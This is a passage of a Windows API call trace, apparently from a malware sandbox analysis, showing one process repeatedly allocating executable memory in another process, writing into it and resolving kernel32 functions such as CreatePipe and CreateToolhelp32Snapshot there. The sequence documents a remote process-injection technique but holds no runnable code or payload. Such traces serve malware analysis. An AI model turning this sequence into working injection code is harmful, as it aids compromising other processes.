	[0215.482] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.482] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.482] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.482] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.482] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004068, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.483] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.483] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.483] lstrlenA (lpString="EnterCriticalSection") returned 20
	[0215.483] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.483] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27497c4*, nSize=0x15, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27497c4*, lpNumberOfBytesWritten=0x128674*=0x15) returned 1
	[0215.484] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.484] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.484] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.484] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.485] ResetEvent (hEvent=0x548) returned 1
	[0215.485] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.485] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.485] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.485] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.485] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.485] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000406c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.486] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.486] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.486] lstrlenA (lpString="LeaveCriticalSection") returned 20
	[0215.486] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.486] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27497dc*, nSize=0x15, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27497dc*, lpNumberOfBytesWritten=0x128674*=0x15) returned 1
	[0215.487] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.487] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.487] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.487] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.488] ResetEvent (hEvent=0x548) returned 1
	[0215.488] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.518] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.518] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.518] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.519] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.519] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004070, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.519] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.519] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.519] lstrlenA (lpString="CreatePipe") returned 10
	[0215.519] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.520] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27497f4*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27497f4*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0215.520] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.520] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.520] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.521] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.521] ResetEvent (hEvent=0x548) returned 1
	[0215.521] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.521] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.521] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.522] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.522] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.522] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004074, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.522] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.522] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.522] lstrlenA (lpString="InitializeCriticalSection") returned 25
	[0215.522] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.523] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749802*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749802*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0215.523] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.523] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.523] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.524] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.524] ResetEvent (hEvent=0x548) returned 1
	[0215.524] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.524] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.524] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.524] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.524] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.525] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004078, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.525] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.525] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.525] lstrlenA (lpString="PeekNamedPipe") returned 13
	[0215.525] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.526] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274981e*, nSize=0xe, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274981e*, lpNumberOfBytesWritten=0x128674*=0xe) returned 1
	[0215.526] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.526] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.526] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.527] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.527] ResetEvent (hEvent=0x548) returned 1
	[0215.527] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.527] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.527] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.528] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.528] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.528] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000407c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.528] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.528] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.528] lstrlenA (lpString="WaitForSingleObject") returned 19
	[0215.529] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.529] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274982e*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274982e*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.530] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.530] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.530] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.531] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.531] ResetEvent (hEvent=0x548) returned 1
	[0215.531] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.532] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.532] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.532] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.532] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.532] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004080, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.532] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.533] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.533] lstrlenA (lpString="FreeLibraryAndExitThread") returned 24
	[0215.533] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.533] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749844*, nSize=0x19, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749844*, lpNumberOfBytesWritten=0x128674*=0x19) returned 1
	[0215.533] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.533] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.533] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.534] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.534] ResetEvent (hEvent=0x548) returned 1
	[0215.534] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.534] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.534] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.535] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.535] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.535] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004084, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.535] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.535] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.535] lstrlenA (lpString="GetLastError") returned 12
	[0215.535] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.536] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274989e*, nSize=0xd, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274989e*, lpNumberOfBytesWritten=0x128674*=0xd) returned 1
	[0215.536] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.536] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.536] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.537] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.537] ResetEvent (hEvent=0x548) returned 1
	[0215.537] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.537] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.537] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.537] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.537] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.537] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004088, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.538] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.538] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.538] lstrlenA (lpString="ExitThread") returned 10
	[0215.538] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.538] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274986c*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274986c*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0215.539] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.539] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.539] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.539] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.540] ResetEvent (hEvent=0x548) returned 1
	[0215.540] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.540] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.540] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.540] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.540] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.540] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000408c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.541] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.541] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.541] lstrlenA (lpString="CreateToolhelp32Snapshot") returned 24
	[0215.541] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.541] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274987a*, nSize=0x19, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274987a*, lpNumberOfBytesWritten=0x128674*=0x19) returned 1
	[0215.541] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.542] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.542] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.542] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.542] ResetEvent (hEvent=0x548) returned 1
	[0215.542] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.543] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.543] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.543] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.543] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.543] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004090, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.544] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.544] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.544] lstrlenA (lpString="Sleep") returned 5
	[0215.544] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.544] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749896*, nSize=0x6, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749896*, lpNumberOfBytesWritten=0x128674*=0x6) returned 1
	[0215.544] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
